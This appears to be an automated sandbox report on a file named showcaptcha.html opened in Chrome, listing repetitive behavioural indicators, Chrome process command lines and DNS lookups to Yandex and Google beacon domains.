N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2184 wrote to memory of 2476 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2476 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2476 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2796 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2796 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2796 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2184 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\showcaptcha.html

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7079758,0x7fef7079768,0x7fef7079778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1612 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2128 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1392 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3128 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 adfstat.yandex.ru udp
US 8.8.8.8:53 mc.yandex.ru udp
US 8.8.8.8:53 adfstat.yandex.ru udp
US 8.8.8.8:53 mc.yandex.ru udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
US 8.8.8.8:53 beacons5.gvt2.com udp
US 8.8.8.8:53 beacons5.gvt3.com udp
